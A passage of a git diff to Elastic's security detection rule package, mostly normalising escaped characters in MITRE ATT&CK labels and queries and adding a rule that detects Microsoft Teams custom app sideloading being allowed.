"security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/bb4fe8d2-7ae2-475c-8b5d-55b449e4264f_101.json b/packages/security_detection_engine/kibana/security_rule/bb4fe8d2-7ae2-475c-8b5d-55b449e4264f_101.json index b365f9526df..905cfe1aa6a 100644 --- a/packages/security_detection_engine/kibana/security_rule/bb4fe8d2-7ae2-475c-8b5d-55b449e4264f_101.json +++ b/packages/security_detection_engine/kibana/security_rule/bb4fe8d2-7ae2-475c-8b5d-55b449e4264f_101.json @@ -58,7 +58,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0040", "name": "Impact", @@ -73,7 +73,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/bb4fe8d2-7ae2-475c-8b5d-55b449e4264f_102.json b/packages/security_detection_engine/kibana/security_rule/bb4fe8d2-7ae2-475c-8b5d-55b449e4264f_102.json index 0363b5e4a49..1ec985c204e 100644 --- a/packages/security_detection_engine/kibana/security_rule/bb4fe8d2-7ae2-475c-8b5d-55b449e4264f_102.json +++ b/packages/security_detection_engine/kibana/security_rule/bb4fe8d2-7ae2-475c-8b5d-55b449e4264f_102.json @@ -56,7 +56,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0040", "name": "Impact", @@ -71,7 +71,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/bb9b13b2-1700-48a8-a750-b43b0a72ab69_102.json b/packages/security_detection_engine/kibana/security_rule/bb9b13b2-1700-48a8-a750-b43b0a72ab69_102.json index 0b70d3fb95e..c5a77ce05f1 100644 --- a/packages/security_detection_engine/kibana/security_rule/bb9b13b2-1700-48a8-a750-b43b0a72ab69_102.json +++ b/packages/security_detection_engine/kibana/security_rule/bb9b13b2-1700-48a8-a750-b43b0a72ab69_102.json @@ -67,7 +67,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0040", "name": "Impact", diff --git a/packages/security_detection_engine/kibana/security_rule/bb9b13b2-1700-48a8-a750-b43b0a72ab69_103.json b/packages/security_detection_engine/kibana/security_rule/bb9b13b2-1700-48a8-a750-b43b0a72ab69_103.json index e4dad4c0ef7..7bbdfe2b7fc 100644 --- a/packages/security_detection_engine/kibana/security_rule/bb9b13b2-1700-48a8-a750-b43b0a72ab69_103.json +++ b/packages/security_detection_engine/kibana/security_rule/bb9b13b2-1700-48a8-a750-b43b0a72ab69_103.json @@ -64,7 +64,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0040", "name": "Impact", diff --git a/packages/security_detection_engine/kibana/security_rule/bb9b13b2-1700-48a8-a750-b43b0a72ab69_104.json b/packages/security_detection_engine/kibana/security_rule/bb9b13b2-1700-48a8-a750-b43b0a72ab69_104.json index 84ab86e8990..a09d5841d85 100644 --- a/packages/security_detection_engine/kibana/security_rule/bb9b13b2-1700-48a8-a750-b43b0a72ab69_104.json +++ b/packages/security_detection_engine/kibana/security_rule/bb9b13b2-1700-48a8-a750-b43b0a72ab69_104.json @@ -64,7 +64,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0040", "name": "Impact", diff --git a/packages/security_detection_engine/kibana/security_rule/bb9b13b2-1700-48a8-a750-b43b0a72ab69_205.json b/packages/security_detection_engine/kibana/security_rule/bb9b13b2-1700-48a8-a750-b43b0a72ab69_205.json index 707a6d0cfc2..2e40b70fb2a 100644 --- a/packages/security_detection_engine/kibana/security_rule/bb9b13b2-1700-48a8-a750-b43b0a72ab69_205.json +++ b/packages/security_detection_engine/kibana/security_rule/bb9b13b2-1700-48a8-a750-b43b0a72ab69_205.json @@ -64,7 +64,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0040", "name": "Impact", diff --git a/packages/security_detection_engine/kibana/security_rule/bba1b212-b85c-41c6-9b28-be0e5cdfc9b1_101.json b/packages/security_detection_engine/kibana/security_rule/bba1b212-b85c-41c6-9b28-be0e5cdfc9b1_101.json index b2a7066b147..bdd6bc63e3e 100644 --- a/packages/security_detection_engine/kibana/security_rule/bba1b212-b85c-41c6-9b28-be0e5cdfc9b1_101.json +++ b/packages/security_detection_engine/kibana/security_rule/bba1b212-b85c-41c6-9b28-be0e5cdfc9b1_101.json @@ -62,7 +62,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0008", "name": "Lateral Movement", diff --git a/packages/security_detection_engine/kibana/security_rule/bba1b212-b85c-41c6-9b28-be0e5cdfc9b1_102.json b/packages/security_detection_engine/kibana/security_rule/bba1b212-b85c-41c6-9b28-be0e5cdfc9b1_102.json index cc9d040ded8..67fae8067e0 100644 --- a/packages/security_detection_engine/kibana/security_rule/bba1b212-b85c-41c6-9b28-be0e5cdfc9b1_102.json +++ b/packages/security_detection_engine/kibana/security_rule/bba1b212-b85c-41c6-9b28-be0e5cdfc9b1_102.json @@ -59,7 +59,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0008", "name": "Lateral Movement", diff --git a/packages/security_detection_engine/kibana/security_rule/bbaa96b9-f36c-4898-ace2-581acb00a409_1.json b/packages/security_detection_engine/kibana/security_rule/bbaa96b9-f36c-4898-ace2-581acb00a409_1.json index 6e03868fbb4..cfaf824284a 100644 --- a/packages/security_detection_engine/kibana/security_rule/bbaa96b9-f36c-4898-ace2-581acb00a409_1.json +++ b/packages/security_detection_engine/kibana/security_rule/bbaa96b9-f36c-4898-ace2-581acb00a409_1.json @@ -13,7 +13,7 @@ "language": "kuery", "license": "Elastic License v2", "name": "Potential SYN-Based Network Scan Detected", - "query": "destination.port :* and network.packets \u003c= 2\n", + "query": "destination.port :* and network.packets <= 2\n", "related_integrations": [ { "package": "endpoint", @@ -47,7 +47,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", @@ -62,7 +62,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0043", "name": "Reconnaissance", diff --git a/packages/security_detection_engine/kibana/security_rule/bbaa96b9-f36c-4898-ace2-581acb00a409_2.json b/packages/security_detection_engine/kibana/security_rule/bbaa96b9-f36c-4898-ace2-581acb00a409_2.json index 2b9f7ca64c6..c8932454c03 100644 --- a/packages/security_detection_engine/kibana/security_rule/bbaa96b9-f36c-4898-ace2-581acb00a409_2.json +++ b/packages/security_detection_engine/kibana/security_rule/bbaa96b9-f36c-4898-ace2-581acb00a409_2.json @@ -13,7 +13,7 @@ "language": "kuery", "license": "Elastic License v2", "name": "Potential SYN-Based Network Scan Detected", - "query": "destination.port : * and network.packets \u003c= 2 and source.ip : (10.0.0.0/8 or 172.16.0.0/12 or 192.168.0.0/16)\n", + "query": "destination.port : * and network.packets <= 2 and source.ip : (10.0.0.0/8 or 172.16.0.0/12 or 192.168.0.0/16)\n", "related_integrations": [ { "package": "endpoint", @@ -52,7 +52,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", @@ -67,7 +67,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0043", "name": "Reconnaissance", diff --git a/packages/security_detection_engine/kibana/security_rule/bbaa96b9-f36c-4898-ace2-581acb00a409_3.json b/packages/security_detection_engine/kibana/security_rule/bbaa96b9-f36c-4898-ace2-581acb00a409_3.json index 145d05412e9..0c113a8da70 100644 --- a/packages/security_detection_engine/kibana/security_rule/bbaa96b9-f36c-4898-ace2-581acb00a409_3.json +++ b/packages/security_detection_engine/kibana/security_rule/bbaa96b9-f36c-4898-ace2-581acb00a409_3.json @@ -15,7 +15,7 @@ "language": "kuery", "license": "Elastic License v2", "name": "Potential SYN-Based Network Scan Detected", - "query": "destination.port : * and network.packets \u003c= 2 and source.ip : (10.0.0.0/8 or 172.16.0.0/12 or 192.168.0.0/16)\n", + "query": "destination.port : * and network.packets <= 2 and source.ip : (10.0.0.0/8 or 172.16.0.0/12 or 192.168.0.0/16)\n", "related_integrations": [ { "package": "endpoint", @@ -54,7 +54,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", @@ -69,7 +69,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0043", "name": "Reconnaissance", diff --git a/packages/security_detection_engine/kibana/security_rule/bbaa96b9-f36c-4898-ace2-581acb00a409_4.json b/packages/security_detection_engine/kibana/security_rule/bbaa96b9-f36c-4898-ace2-581acb00a409_4.json index e67fc46cb37..c3a9386b805 100644 --- a/packages/security_detection_engine/kibana/security_rule/bbaa96b9-f36c-4898-ace2-581acb00a409_4.json +++ b/packages/security_detection_engine/kibana/security_rule/bbaa96b9-f36c-4898-ace2-581acb00a409_4.json @@ -16,7 +16,7 @@ "license": "Elastic License v2", "max_signals": 5, "name": "Potential SYN-Based Network Scan Detected", - "query": "destination.port : * and network.packets \u003c= 2 and source.ip : (10.0.0.0/8 or 172.16.0.0/12 or 192.168.0.0/16)\n", + "query": "destination.port : * and network.packets <= 2 and source.ip : (10.0.0.0/8 or 172.16.0.0/12 or 192.168.0.0/16)\n", "related_integrations": [ { "package": "endpoint", @@ -55,7 +55,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", @@ -70,7 +70,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0043", "name": "Reconnaissance", diff --git a/packages/security_detection_engine/kibana/security_rule/bbd1a775-8267-41fa-9232-20e5582596ac_101.json b/packages/security_detection_engine/kibana/security_rule/bbd1a775-8267-41fa-9232-20e5582596ac_101.json index cbf1778ec98..0ce8ede0f71 100644 --- a/packages/security_detection_engine/kibana/security_rule/bbd1a775-8267-41fa-9232-20e5582596ac_101.json +++ b/packages/security_detection_engine/kibana/security_rule/bbd1a775-8267-41fa-9232-20e5582596ac_101.json @@ -78,7 +78,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/bbd1a775-8267-41fa-9232-20e5582596ac_102.json b/packages/security_detection_engine/kibana/security_rule/bbd1a775-8267-41fa-9232-20e5582596ac_102.json index 0d497fae758..6b77b47db09 100644 --- a/packages/security_detection_engine/kibana/security_rule/bbd1a775-8267-41fa-9232-20e5582596ac_102.json +++ b/packages/security_detection_engine/kibana/security_rule/bbd1a775-8267-41fa-9232-20e5582596ac_102.json @@ -75,7 +75,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/bbd1a775-8267-41fa-9232-20e5582596ac_103.json b/packages/security_detection_engine/kibana/security_rule/bbd1a775-8267-41fa-9232-20e5582596ac_103.json new file mode 100644 index 00000000000..05fc3a7c088 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/bbd1a775-8267-41fa-9232-20e5582596ac_103.json @@ -0,0 +1,93 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies when custom applications are allowed in Microsoft Teams. If an organization requires applications other than those available in the Teams app store, custom applications can be developed as packages and uploaded. An adversary may abuse this behavior to establish persistence in an environment.", + "false_positives": [ + "Custom applications may be allowed by a system or network administrator. Verify that the configuration change was expected. Exceptions can be added to this rule to filter expected behavior." + ], + "from": "now-30m", + "index": [ + "filebeat-*", + "logs-o365*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Microsoft 365 Teams Custom Application Interaction Allowed", + "note": "", + "query": "event.dataset:o365.audit and event.provider:MicrosoftTeams and\nevent.category:web and event.action:TeamsTenantSettingChanged and\no365.audit.Name:\"Allow sideloading and interaction of custom apps\" and\no365.audit.NewValue:True and event.outcome:success\n", + "references": [ + "https://docs.microsoft.com/en-us/microsoftteams/platform/concepts/deploy-and-publish/apps-upload" + ], + "related_integrations": [ + { + "package": "o365", + "version": "^1.3.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + }, + { + "ecs": false, + "name": "o365.audit.Name", + "type": "keyword" + }, + { + "ecs": false, + "name": "o365.audit.NewValue", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "bbd1a775-8267-41fa-9232-20e5582596ac", + "setup": "The Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "severity": "medium", + "tags": [ + "Domain: Cloud", + "Data Source: Microsoft 365", + "Use Case: Configuration Audit", + "Tactic: Persistence" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 103 + }, + "id": "bbd1a775-8267-41fa-9232-20e5582596ac_103", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/bc0c6f0d-dab0-47a3-b135-0925f0a333bc_105.json b/packages/security_detection_engine/kibana/security_rule/bc0c6f0d-dab0-47a3-b135-0925f0a333bc_105.json index 60f36d07308..ac04ca6c441 100644 --- a/packages/security_detection_engine/kibana/security_rule/bc0c6f0d-dab0-47a3-b135-0925f0a333bc_105.json +++ b/packages/security_detection_engine/kibana/security_rule/bc0c6f0d-dab0-47a3-b135-0925f0a333bc_105.json @@ -76,7 +76,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/bc0c6f0d-dab0-47a3-b135-0925f0a333bc_106.json b/packages/security_detection_engine/kibana/security_rule/bc0c6f0d-dab0-47a3-b135-0925f0a333bc_106.json index ee9433813e5..9722f6eca33 100644 --- a/packages/security_detection_engine/kibana/security_rule/bc0c6f0d-dab0-47a3-b135-0925f0a333bc_106.json +++ b/packages/security_detection_engine/kibana/security_rule/bc0c6f0d-dab0-47a3-b135-0925f0a333bc_106.json @@ -74,7 +74,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/bc0c6f0d-dab0-47a3-b135-0925f0a333bc_107.json b/packages/security_detection_engine/kibana/security_rule/bc0c6f0d-dab0-47a3-b135-0925f0a333bc_107.json index b4cbabc0d33..cc139124014 100644 --- a/packages/security_detection_engine/kibana/security_rule/bc0c6f0d-dab0-47a3-b135-0925f0a333bc_107.json +++ b/packages/security_detection_engine/kibana/security_rule/bc0c6f0d-dab0-47a3-b135-0925f0a333bc_107.json @@ -74,7 +74,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/bc0c6f0d-dab0-47a3-b135-0925f0a333bc_208.json b/packages/security_detection_engine/kibana/security_rule/bc0c6f0d-dab0-47a3-b135-0925f0a333bc_208.json index 6d630e98345..0b0dfee712a 100644 --- a/packages/security_detection_engine/kibana/security_rule/bc0c6f0d-dab0-47a3-b135-0925f0a333bc_208.json +++ b/packages/security_detection_engine/kibana/security_rule/bc0c6f0d-dab0-47a3-b135-0925f0a333bc_208.json @@ -74,7 +74,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/bc0f2d83-32b8-4ae2-b0e6-6a45772e9331_103.json b/packages/security_detection_engine/kibana/security_rule/bc0f2d83-32b8-4ae2-b0e6-6a45772e9331_103.json index 9d00593330a..99d44e48745 100644 --- a/packages/security_detection_engine/kibana/security_rule/bc0f2d83-32b8-4ae2-b0e6-6a45772e9331_103.json +++ b/packages/security_detection_engine/kibana/security_rule/bc0f2d83-32b8-4ae2-b0e6-6a45772e9331_103.json @@ -53,7 +53,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0040", "name": "Impact", diff --git a/packages/security_detection_engine/kibana/security_rule/bc0f2d83-32b8-4ae2-b0e6-6a45772e9331_104.json b/packages/security_detection_engine/kibana/security_rule/bc0f2d83-32b8-4ae2-b0e6-6a45772e9331_104.json index e3a25a98b96..0674ee08bc7 100644 --- a/packages/security_detection_engine/kibana/security_rule/bc0f2d83-32b8-4ae2-b0e6-6a45772e9331_104.json +++ b/packages/security_detection_engine/kibana/security_rule/bc0f2d83-32b8-4ae2-b0e6-6a45772e9331_104.json @@ -50,7 +50,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0040", "name": "Impact", diff --git a/packages/security_detection_engine/kibana/security_rule/bc1eeacf-2972-434f-b782-3a532b100d67_102.json b/packages/security_detection_engine/kibana/security_rule/bc1eeacf-2972-434f-b782-3a532b100d67_102.json index ec15e358c76..f1702211aa3 100644 --- a/packages/security_detection_engine/kibana/security_rule/bc1eeacf-2972-434f-b782-3a532b100d67_102.json +++ b/packages/security_detection_engine/kibana/security_rule/bc1eeacf-2972-434f-b782-3a532b100d67_102.json @@ -69,7 +69,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/bc1eeacf-2972-434f-b782-3a532b100d67_103.json b/packages/security_detection_engine/kibana/security_rule/bc1eeacf-2972-434f-b782-3a532b100d67_103.json index 65678dc18a1..887d50e6719 100644 --- a/packages/security_detection_engine/kibana/security_rule/bc1eeacf-2972-434f-b782-3a532b100d67_103.json +++ b/packages/security_detection_engine/kibana/security_rule/bc1eeacf-2972-434f-b782-3a532b100d67_103.json @@ -68,7 +68,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/bc1eeacf-2972-434f-b782-3a532b100d67_104.json b/packages/security_detection_engine/kibana/security_rule/bc1eeacf-2972-434f-b782-3a532b100d67_104.json index d3d50cef82f..76119e89496 100644 --- a/packages/security_detection_engine/kibana/security_rule/bc1eeacf-2972-434f-b782-3a532b100d67_104.json +++ b/packages/security_detection_engine/kibana/security_rule/bc1eeacf-2972-434f-b782-3a532b100d67_104.json @@ -69,7 +69,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/bc1eeacf-2972-434f-b782-3a532b100d67_105.json b/packages/security_detection_engine/kibana/security_rule/bc1eeacf-2972-434f-b782-3a532b100d67_105.json index ca2478dfc19..1d8a22bfcc9 100644 --- a/packages/security_detection_engine/kibana/security_rule/bc1eeacf-2972-434f-b782-3a532b100d67_105.json +++ b/packages/security_detection_engine/kibana/security_rule/bc1eeacf-2972-434f-b782-3a532b100d67_105.json @@ -69,7 +69,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/bc48bba7-4a23-4232-b551-eca3ca1e3f20_101.json b/packages/security_detection_engine/kibana/security_rule/bc48bba7-4a23-4232-b551-eca3ca1e3f20_101.json index 5de77cf0472..5f885de11c2 100644 --- a/packages/security_detection_engine/kibana/security_rule/bc48bba7-4a23-4232-b551-eca3ca1e3f20_101.json +++ b/packages/security_detection_engine/kibana/security_rule/bc48bba7-4a23-4232-b551-eca3ca1e3f20_101.json @@ -59,7 +59,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/bc48bba7-4a23-4232-b551-eca3ca1e3f20_102.json b/packages/security_detection_engine/kibana/security_rule/bc48bba7-4a23-4232-b551-eca3ca1e3f20_102.json index f7670fec21f..f10907efc50 100644 --- a/packages/security_detection_engine/kibana/security_rule/bc48bba7-4a23-4232-b551-eca3ca1e3f20_102.json +++ b/packages/security_detection_engine/kibana/security_rule/bc48bba7-4a23-4232-b551-eca3ca1e3f20_102.json @@ -57,7 +57,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/bc8ca7e0-92fd-4b7c-b11e-ee0266b8d9c9_2.json b/packages/security_detection_engine/kibana/security_rule/bc8ca7e0-92fd-4b7c-b11e-ee0266b8d9c9_2.json index bdf36765141..30be0593229 100644 --- a/packages/security_detection_engine/kibana/security_rule/bc8ca7e0-92fd-4b7c-b11e-ee0266b8d9c9_2.json +++ b/packages/security_detection_engine/kibana/security_rule/bc8ca7e0-92fd-4b7c-b11e-ee0266b8d9c9_2.json @@ -69,7 +69,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0011", "name": "Command and Control", diff --git a/packages/security_detection_engine/kibana/security_rule/bc8ca7e0-92fd-4b7c-b11e-ee0266b8d9c9_3.json b/packages/security_detection_engine/kibana/security_rule/bc8ca7e0-92fd-4b7c-b11e-ee0266b8d9c9_3.json index e74ec49ca79..d0383407e23 100644 --- a/packages/security_detection_engine/kibana/security_rule/bc8ca7e0-92fd-4b7c-b11e-ee0266b8d9c9_3.json +++ b/packages/security_detection_engine/kibana/security_rule/bc8ca7e0-92fd-4b7c-b11e-ee0266b8d9c9_3.json @@ -68,7 +68,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0011", "name": "Command and Control", diff --git a/packages/security_detection_engine/kibana/security_rule/bc8ca7e0-92fd-4b7c-b11e-ee0266b8d9c9_4.json b/packages/security_detection_engine/kibana/security_rule/bc8ca7e0-92fd-4b7c-b11e-ee0266b8d9c9_4.json index 3fc5be541c6..0b655f4a4ed 100644 --- a/packages/security_detection_engine/kibana/security_rule/bc8ca7e0-92fd-4b7c-b11e-ee0266b8d9c9_4.json +++ b/packages/security_detection_engine/kibana/security_rule/bc8ca7e0-92fd-4b7c-b11e-ee0266b8d9c9_4.json @@ -69,7 +69,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0011", "name": "Command and Control", diff --git a/packages/security_detection_engine/kibana/security_rule/bc8ca7e0-92fd-4b7c-b11e-ee0266b8d9c9_5.json b/packages/security_detection_engine/kibana/security_rule/bc8ca7e0-92fd-4b7c-b11e-ee0266b8d9c9_5.json index 63b7d8ff4be..95152cef23d 100644 --- a/packages/security_detection_engine/kibana/security_rule/bc8ca7e0-92fd-4b7c-b11e-ee0266b8d9c9_5.json +++ b/packages/security_detection_engine/kibana/security_rule/bc8ca7e0-92fd-4b7c-b11e-ee0266b8d9c9_5.json @@ -74,7 +74,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0011", "name": "Command and Control", diff --git a/packages/security_detection_engine/kibana/security_rule/bc9e4f5a-e263-4213-a2ac-1edf9b417ada_1.json b/packages/security_detection_engine/kibana/security_rule/bc9e4f5a-e263-4213-a2ac-1edf9b417ada_1.json index e68cccf05f3..82804ea99a8 100644 --- a/packages/security_detection_engine/kibana/security_rule/bc9e4f5a-e263-4213-a2ac-1edf9b417ada_1.json +++ b/packages/security_detection_engine/kibana/security_rule/bc9e4f5a-e263-4213-a2ac-1edf9b417ada_1.json @@ -65,7 +65,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/bca7d28e-4a48-47b1-adb7-5074310e9a61_103.json b/packages/security_detection_engine/kibana/security_rule/bca7d28e-4a48-47b1-adb7-5074310e9a61_103.json index 298086c9f87..120c26554d7 100644 --- a/packages/security_detection_engine/kibana/security_rule/bca7d28e-4a48-47b1-adb7-5074310e9a61_103.json +++ b/packages/security_detection_engine/kibana/security_rule/bca7d28e-4a48-47b1-adb7-5074310e9a61_103.json @@ -58,7 +58,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0040", "name": "Impact", diff --git a/packages/security_detection_engine/kibana/security_rule/bca7d28e-4a48-47b1-adb7-5074310e9a61_104.json b/packages/security_detection_engine/kibana/security_rule/bca7d28e-4a48-47b1-adb7-5074310e9a61_104.json index 4ad048b6642..b3da73966a0 100644 --- a/packages/security_detection_engine/kibana/security_rule/bca7d28e-4a48-47b1-adb7-5074310e9a61_104.json +++ b/packages/security_detection_engine/kibana/security_rule/bca7d28e-4a48-47b1-adb7-5074310e9a61_104.json @@ -56,7 +56,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0040", "name": "Impact", diff --git a/packages/security_detection_engine/kibana/security_rule/bcaa15ce-2d41-44d7-a322-918f9db77766_1.json b/packages/security_detection_engine/kibana/security_rule/bcaa15ce-2d41-44d7-a322-918f9db77766_1.json index 1e7cfe6d49f..797f0ccde2c 100644 --- a/packages/security_detection_engine/kibana/security_rule/bcaa15ce-2d41-44d7-a322-918f9db77766_1.json +++ b/packages/security_detection_engine/kibana/security_rule/bcaa15ce-2d41-44d7-a322-918f9db77766_1.json @@ -59,7 +59,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0011", "name": "Command and Control", diff --git a/packages/security_detection_engine/kibana/security_rule/bd2c86a0-8b61-4457-ab38-96943984e889_105.json b/packages/security_detection_engine/kibana/security_rule/bd2c86a0-8b61-4457-ab38-96943984e889_105.json index 84c3f0a17e1..42761c84d92 100644 --- a/packages/security_detection_engine/kibana/security_rule/bd2c86a0-8b61-4457-ab38-96943984e889_105.json +++ b/packages/security_detection_engine/kibana/security_rule/bd2c86a0-8b61-4457-ab38-96943984e889_105.json @@ -48,7 +48,7 @@ ], "risk_score": 47, "rule_id": "bd2c86a0-8b61-4457-ab38-96943984e889", - "setup": "The 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nAdministrative Templates \u003e\nWindows PowerShell \u003e\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```", + "setup": "The 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```", "severity": "medium", "tags": [ "Elastic", @@ -61,7 +61,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0009", "name": "Collection", @@ -83,7 +83,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/bd2c86a0-8b61-4457-ab38-96943984e889_106.json b/packages/security_detection_engine/kibana/security_rule/bd2c86a0-8b61-4457-ab38-96943984e889_106.json index 9914103bdce..065b8f9d8ce 100644 --- a/packages/security_detection_engine/kibana/security_rule/bd2c86a0-8b61-4457-ab38-96943984e889_106.json +++ b/packages/security_detection_engine/kibana/security_rule/bd2c86a0-8b61-4457-ab38-96943984e889_106.json @@ -48,7 +48,7 @@ ], "risk_score": 